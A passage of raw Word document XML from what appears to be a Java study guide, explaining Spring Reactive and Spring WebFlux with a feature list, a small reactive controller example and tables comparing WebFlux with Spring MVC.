          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69887727"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C03F">
          <v:rect id="_x0000_i2204" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FF852"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gridCol w:w="2284"/>
      </w:tblGrid>
      <w:tr w:rsidR="00260A37" w:rsidRPr="00260A37" w14:paraId="2A8FBB42" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF643DF"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9692F0"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Reactive Recommended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260A37" w:rsidRPr="00260A37" w14:paraId="727A24C3" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="670FA40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al-time streaming (stocks, chat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E154EB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3A1CBA50" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52E13BF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ST APIs with high concurrent users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25C60E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408B9CE4" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B245079"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raditional CRUD-based admin panels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B3021C0"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r w:rsidR="00260A37" w:rsidRPr="00260A37" w14:paraId="5CE3835C" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="470E9E0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Applications where thread blocking is okay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D0A1FF"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bl>
    <w:p w14:paraId="1F334474"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B817C4">
          <v:rect id="_x0000_i2205" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD5DC6D" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003831D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In short:</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Spring Reactive when you want to build non-blocking, high-throughput apps that can scale efficiently under heavy traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376039D"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Want a quick sample comparing traditional vs reactive in code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B34F11"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206" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F1A366" w14:textId="325C9617" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00163F3B" w:rsidP="00484F17">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="499" w:name="_Toc197867713"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00484F17" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w14:paraId="2FF3E33B" w14:textId="4AF10ACA"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is a reactive, non-blocking web framework introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is designed to handle asynchronous, event-driven applications using </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fewer resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6111C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A69AC">
          <v:rect id="_x0000_i2207" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F47DE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Key Features of Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EC2A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active Programming Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Project Reactor (Mono, Flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCDB82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Built on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servers like Netty, Undertow, or Servlet 3.1+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581DF72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upports </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional and annotation-based programming styles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F3DF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streaming</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real-time app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IoT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4818889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s with </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a non-blocking alternative to RestTemplate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703DDA1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4B032">
          <v:rect id="_x0000_i2208" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE52D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27"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1F18EC72" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6607C79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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5381369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60142418" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A3388D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="461649A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or 1 result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="28C94620" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FB98EC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T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CA81F6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to N results (stream)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="3B114B1A" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C940AB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outerFunction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666B3D0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unctional route definitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="5BE2CA1E" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="217AED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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03EAA5A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HTTP client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2670CCC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8374C">
          <v:rect id="_x0000_i2209" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D772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imple Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128163E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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E30A2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class HelloController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09098DEE" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E969E6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GetMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348B9E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public Mono&lt;String&gt; sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18119C6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from WebFlux!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9029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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD450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8228C4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1E1CE0">
          <v:rect id="_x0000_i2210" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C91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Spring WebFlux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F2D6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or </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous I/O</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event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EDBD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handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thousands of concurrent connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795452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ith reactive data access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EABD3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al-time apps like </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cha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notification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streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268F76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6950B">
          <v:rect id="_x0000_i2211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE8659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627"/>
        <w:gridCol w:w="2709"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="2873CB50" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518E21C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4B3AE6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0C36AC1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110646E7" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D4B8C4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rogramming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5652A12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3AFCD86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6FDBD202" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38DAC5D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BE48C3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Servlet API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49E4F6C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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="09FC8CF9" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F148CE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ncurrency Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="326DCB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per-request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3926364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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="47143D63" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38B8DDC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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="272049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 for high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CA6D3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fficient at scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6103F3D5" w14:textId="07EBB16A" w:rsidR="00056743" w:rsidRPr="00CE4B95"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212" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291A68E" w14:textId="73BDDE40" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="00163F3B" w:rsidP="00163F3B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="500" w:name="_Toc197867714"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Spring WebFlux and Spring MVC?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="500"/>
    </w:p>
    <w:p w14:paraId="7B6F303E" w14:textId="656F931C"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oncise </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between Spring WebFlux and Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">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360"/>
        <w:gridCol w:w="4540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6408AB64" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="739AC3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133955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 (Traditional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1980249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 (Reactive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="069CA259" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BA402C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rogramming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E0C6C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5DB512B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2CB07EF1" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="420CE0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nderlying Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="031F12C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 (Tomcat, Jetty, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
